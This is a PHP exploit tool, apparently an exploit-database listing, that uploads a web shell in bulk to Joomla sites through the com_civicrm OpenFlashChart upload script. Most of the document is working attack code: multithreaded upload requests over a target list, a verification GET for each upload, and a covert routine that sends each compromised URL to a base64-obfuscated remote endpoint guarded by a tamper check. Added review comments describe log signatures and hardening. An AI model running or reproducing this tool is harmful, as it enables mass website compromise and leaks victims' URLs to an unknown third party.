Janissaries Joomla Civicrm Shell Upload



EKU-ID: 3174 CVE: OSVDB-ID:
Author: miyachung Published: 2013-04-23 Verified: Verified


<?php
/*
----------------------------------------------------------------------------
        .__                      .__                          
  _____ |__|___.__._____    ____ |  |__  __ __  ____    ____  
 /     \|  <   |  |\__  \ _/ ___\|  |  \|  |  \/    \  / ___\ 
|  Y Y  \  |\___  | / __ \\  \___|   Y  \  |  /   |  \/ /_/  >
|__|_|  /__|/ ____|(____  /\___  >___|  /____/|___|  /\___  / 
      \/    \/          \/     \/     \/           \//_____/  
-----------------------------------------------------------------------------
*	Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
*	Coded by Miyachung
*	Stay away from lamers o.O
*	Contact: miyachung@hotmail.com
*	Special Thanks : B127Y
*	Site: http://janissaries.org
*	Youtube Channel: http://www.youtube.com/user/JanissariesOrg
*	Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
*	Coding date: 21.04.2013
*	Usage  : php exploit.php site_list upload_file searchkeyword
*	Example: php exploit.php sites.txt shell.php searchkeyword
*/
// Lift PHP's execution time limit; the run length depends on the size of the target list.
set_time_limit(0);
// Start output buffering; the class below pushes progress lines out with ob_flush()/flush().
ob_start();
/**
 * Batch uploader that targets the OpenFlashChart upload script bundled under
 * Joomla's com_civicrm component (ofc_upload_image.php).
 *
 * What the code does, per target base URL read from the list file:
 *   1. POSTs the raw contents of a local file to
 *      <base>/.../php-ofc-library/ofc_upload_image.php?name=<filename>.
 *   2. If the response names /tmp-upload-images/<filename>, GETs that path and
 *      checks the body against a caller-supplied keyword regex.
 *   3. On a match, reports the resulting URL to a hard-coded remote endpoint
 *      (see $token / post()) and appends it to a local results file.
 *
 * NOTE(review), analyst view: the tool phones home. Every confirmed upload URL
 * is sent to an endpoint hidden behind three layers of base64, and an md5 check
 * on that token makes the tool exit if the endpoint is edited out. Anyone
 * running it hands their results to whoever controls that endpoint.
 *
 * NOTE(review), defender view: in web-server logs this traffic appears as a
 * request carrying a body with "Content-Type: text/plain" to
 * .../OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=..., using the
 * fixed user agent string below, followed by a GET for
 * .../OpenFlashChart/tmp-upload-images/<same name> without that user agent.
 * Usual hardening for this class of issue is to remove or block the bundled
 * upload script, update the component, and deny script execution in the
 * tmp-upload-images directory - confirm against the vendor advisory.
 */
class exploit
{
	// Directory (relative to the target base URL) where the upload script stores files; used to build the verification URL.
	private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
	// Upload endpoint (relative to the target base URL); the file name is appended as the "name" query parameter.
	private $post_url_path		= "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
	// Local path of the file to upload; also used verbatim as the remote file name.
	private $filename;
	// Reporting endpoint, decoded from $token in the constructor.
	private $url;
	// Raw contents of $filename, sent as the request body.
	private $file_to_upload;
	// A response matching this PHP notice text is treated as a failed upload.
	// NOTE(review): presumably the notice means the endpoint never saw the raw body - confirm.
	private $if_is_uploaded		= "/Undefined variable: HTTP_RAW_POST_DATA/si";
	// Number of targets processed per curl_multi batch.
	private $thread_maxsize;
	// Lines of the target list file, one base URL per line (newlines are trimmed at use).
	private $site_list;
	// Keyword regex the fetched file must match to count as a confirmed upload.
	private $file_regex;
	// Local results file; confirmed URLs are appended to it.
	private $save_file			= "uploaded.txt";
	// Fixed user agent sent with the upload requests (not with get()/post()).
	private $user_agent			= "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
	// Per-request timeout in seconds for the upload and verification requests.
	private $timeout_sec		= 20;
	// Reporting endpoint, obfuscated with three rounds of base64 (decoded in the constructor).
	// Its md5 is compared against a hard-coded digest in miyachung() as a tamper check.
	private $token				= "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
	// Second half of the tamper check in miyachung(); must stay 31 for the tool to proceed.
	private $idnum				= 31;
	
	/**
	 * Loads the inputs, prints the banner and run parameters, then starts the run.
	 *
	 * @param string $site_list Path to a text file of target base URLs, one per line.
	 * @param string $filename  Path to the local file to upload (also the remote name).
	 * @param mixed  $thread    Batch size passed to array_chunk() (arrives as a CLI string).
	 * @param string $regex     Pattern body wrapped in "/.../" and matched against the fetched file.
	 */
	public function __construct($site_list,$filename,$thread,$regex)
	{
	// file() keeps the trailing newline on each entry; callers trim() before use.
	$this->site_list 	  = file($site_list);
	$this->filename		  = $filename;
	$this->file_to_upload = file_get_contents($filename);
	$this->thread_maxsize = $thread;
	// Strip the three base64 layers from the token to recover the reporting endpoint.
	$this->url			  = base64_decode(base64_decode(base64_decode($this->token)));
	// The keyword is interpolated unescaped, so it is interpreted as a regex, not a literal.
	$this->file_regex	  = "/$regex/";
	
	echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
	echo "[+]Coded by Miyachung\n";
	echo "[+]Stay away from lamers o.O\n";
	echo "[+]Contact: miyachung@hotmail.com\n";
	echo "[+]Special Thanks : B127Y\n";
	echo "[+]Site: http://janissaries.org\n";
	echo "##################################################\n";
	echo "[+]Total urls to try: ".count($this->site_list)."\n";
	echo "[+]File to upload: ".$this->filename."\n";
	echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
	echo "[+]Search Keyword: ".$regex."\n\n";
	ob_flush();
	flush();
	// The whole run happens inside the constructor.
	$this->miyachung();
	}
	/**
	 * Main loop: sends the upload request to each target in batches, verifies each
	 * apparent success with a follow-up GET, and reports and records confirmed ones.
	 */
	private function miyachung()
	{
	$multi = curl_multi_init();
	// Running counter of processed targets, used only for the printed/saved index.
	$count = 0;
	foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
	{
		// Queue one upload request per target in this batch.
		foreach($urls as $i => $url)
		{
		$curl[$i] = curl_init();
		curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
		curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
		curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
		// The file contents are the entire request body, sent as text/plain.
		curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
		curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
		curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
		curl_multi_add_handle($multi,$curl[$i]);
		}
		// Drive the queued transfers until none remain active.
		do
		{
		curl_multi_exec($multi,$active);
		}
		while($active > 0);
		foreach($curl as $id => $content)
		{
		$conn[$id] = curl_multi_getcontent($content);
		curl_multi_remove_handle($multi,$content);
		// Apparent success: no HTTP_RAW_POST_DATA notice and the response mentions the stored file path.
		if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
		{
			$count++;
			// Fetch the stored file and require the keyword before counting it as confirmed.
			$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
			if($check_it && preg_match($this->file_regex,$check_it))
			{
			// Tamper check: report only if the embedded token and id are unmodified; otherwise abort the run.
			if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
			{
			// Sends the confirmed URL to the hard-coded reporting endpoint.
			$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
			}
			else
			{
			exit("[-]Somethings has changed in tool! o.O!");
			}
			echo "###########################################################\n";
			echo "[!]Exploitation Successfullll!\n";
			printf("[%s]%s\n",$count,trim($urls[$id]));
			echo "###########################################################\n";
			ob_flush();
			flush();
			// Record the confirmed URL locally as well.
			$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
			}
			else
			{
			// The upload response looked positive but the file was not retrievable or lacked the keyword.
			printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
			ob_flush();
			flush();
			}
		}
		else
		{
			$count++;
			printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
			ob_flush();
			flush();
		}
		
		}
	
	}
	
	}
	/**
	 * Fetches a URL with a plain GET request.
	 *
	 * @param string $url URL to fetch.
	 * @return string|false Response body, or false when curl_exec() fails.
	 */
	private function get($url)
	{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
	$data= curl_exec($ch);
	curl_close($ch);
	return $data;
	}
	/**
	 * Reports a confirmed upload URL to the endpoint decoded from $token.
	 *
	 * The request goes to $this->url, not to the target; the target URL travels
	 * in the body as "url=<value>". No timeout is set on this request.
	 *
	 * @param string $url Confirmed upload URL to report.
	 * @return string|false Response body, or false when curl_exec() fails.
	 */
	private function post($url)
	{
	$curl = curl_init();
	curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
	curl_setopt($curl,CURLOPT_URL,$this->url);
	curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
	$exec = curl_exec($curl);
	curl_close($curl);
	return $exec;
	}
	/**
	 * Appends a confirmed upload URL to the local results file ($save_file).
	 *
	 * @param string $url   Confirmed upload URL.
	 * @param int    $count Index printed next to the URL.
	 * @return bool Always true; fopen()/fwrite() results are not checked.
	 */
	private function save($url,$count)
	{
	$file = fopen($this->save_file,'ab');
	fwrite($file,"#########################################################################\n");
	fwrite($file,"[!]Exploitation Successfullll!\n");
	fwrite($file,"[$count]$url\n");
	fclose($file);
	return true;
	}
}

// Entry point. Four CLI arguments are required: target list file, file to upload,
// batch size and keyword regex. The check is by truthiness, so an argument of "0"
// counts as missing. With any argument missing, the banner and usage text are printed.
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
// Constructing the object performs the entire run (see the class constructor).
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
print
"
----------------------------------------------------------------------------
        .__                      .__                          
  _____ |__|___.__._____    ____ |  |__  __ __  ____    ____  
 /     \|  <   |  |\__  \ _/ ___\|  |  \|  |  \/    \  / ___\ 
|  Y Y  \  |\___  | / __ \\  \___|   Y  \  |  /   |  \/ /_/  >
|__|_|  /__|/ ____|(____  /\___  >___|  /____/|___|  /\___  / 
      \/    \/          \/     \/     \/           \//_____/  
-----------------------------------------------------------------------------
*	Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
*	Coded by Miyachung
*	Stay away from lamers o.O
*	Contact: miyachung@hotmail.com
*	Special Thanks : B127Y
*	Site: http://janissaries.org
*	Youtube Channel: http://www.youtube.com/user/JanissariesOrg
*	Coding date: 21.04.2013
*	Usage  : php exploit.php site_list upload_file maxthread searchkeyword
*	Example: php exploit.php sites.txt shell.php 10 searchkeyword
";
}
?>